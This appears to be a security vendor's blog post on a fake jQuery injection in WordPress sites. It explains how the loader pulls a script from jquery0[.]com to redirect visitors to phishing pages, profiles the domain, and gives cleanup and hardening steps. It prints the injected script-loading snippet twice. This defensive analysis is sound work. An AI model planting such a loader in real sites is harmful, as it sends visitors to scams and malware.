Fix Fake jQuery Redirection to Scam Domain Visitors to jquery0.com
A new infection has been detected on several WordPress sites. It can be executed through a malicious script that comes from a domain known as https://jquery0[.]com/JkrJYcvQ
If you have norton antivirus installed and updated with latest definitions it will flag opening of such website.
When site visitors see the well-known jQuery name in the requests, they can get the impression that it’s okay to load the content. Regrettably, the domain in question is not a perfect match, and it exhibits malignant tendencies. Phishing and spamming campaigns frequently make use of this strategy to deceive victims into believing that the resources in question are genuine.
First things first, let’s have a look at the injection.
var khutmhpx = document.createElement('script'); khutmhpx.src = 'https://jquery0[.]com/JkrJYcvQ'; document.getElementsByTagName('head').appendChild(khutmhpx);
Let’s have a look at what this three-line piece of code is doing and break it down.
- To begin, the code generates a brand-new script tag and sets the src argument to the address https://jquery0.com/JkrJYcvQ.
- Following that, it adds it to the currently displayed page and begins the process of running the script.
- The final step of the injection involves the execution of the script located at https://jquery0.com/JkrJYcv, which leads users to fraudulent websites.
This injection has been discovered in a variety of different WordPress files, including the following, for instance:
Investigating the potentially harmful website jquery0[.]com
Let’s take a more in-depth look at the malicious domain that was utilised in the script that was just described to you.
Finding out a lot about a domain by looking at the WHOIS information for the https://jquery0.com website is possible.
In light of these findings, we can deduce the following:
The domain name was just recently acquired. (July 04, 2022)
CloudFlare, which is frequently utilised by cybercriminals, is being used by the site in question.
It’s important to note that the domain just utilises CloudFlare for the Name Servers; it doesn’t make use of the CloudFlare firewall in any capacity. The following URL can be used to directly access the IP address 220.127.116.11 that is located on a Russian CHANGWAY-AS network: https://urlscan.io/ip/18.104.22.168.
Redirects Links to Fraudulent Online Pages
End users are tricked into providing their personal information by being led to fraudulent websites as soon as the malicious script has been activated on their computers. For instance, one of the variants offers the following hoax giveaway for an Apple iPhone 13 Pro:
When the victim clicks the “Ok” button, they are taken to a page where sensitive personal information is collected from them.
The use of a sense of urgency and a deadline is a typical tactic employed by cybercriminals on phishing websites in an effort to coerce potential victims into making a snap decision to provide their sensitive information.
However, this particular con is just one of many conceivable permutations that may be attempted. MalwareBytes has just recently discovered that this domain is also connected to the malware campaigns known as FakeUpdates and SocGholish.
Steps to Clean Website from JQuery0.com Infection
Once an attacker has acquired unauthorized access to a website, one of the most common tactics that they will take is to inject malicious scripts into the JS files and the files that make up WordPress.
Remove below script from JS files.
var khutmhpx = document.createElement(‘script’);
khutmhpx.src = ‘https://jquery0[.]com/JkrJYcvQ’;
These scripts, which will fool end users into handing out their personal information, can be well disguised within the files that make up the core of WordPress as well as the files that make up plugins.
- Make sure that your website’s plugins, themes, and software are all up to date. Always apply the most recent patch to get the most up-to-date protection against known software vulnerabilities.
- Conduct routine scans for malicious software and backdoors. This entails doing scans at both the server and client levels in order to detect any potentially harmful injections, SEO spam, or backdoors that might be hiding on your website.
- Always use a different password for each of your online accounts. This provides login information for sFTP, database, and cPanel users as well as admin users.
- Keep an eye on your logs for any indications of a security breach. Always keep an eye out for anything that seems odd or fishy, and give serious consideration to installing a file integrity monitoring system on your website.
- Invest in a firewall for web applications (WAF). Firewalls can assist reduce the impact of malicious bots, protect against brute force assaults, and identify intrusion attempts in your environment.
And if you feel that harmful scripts have been inserted into your site or that it has been compromised in any way, we are here to assist you. If you contact our customer care team for assistance, we will be able to remove the malware on your behalf.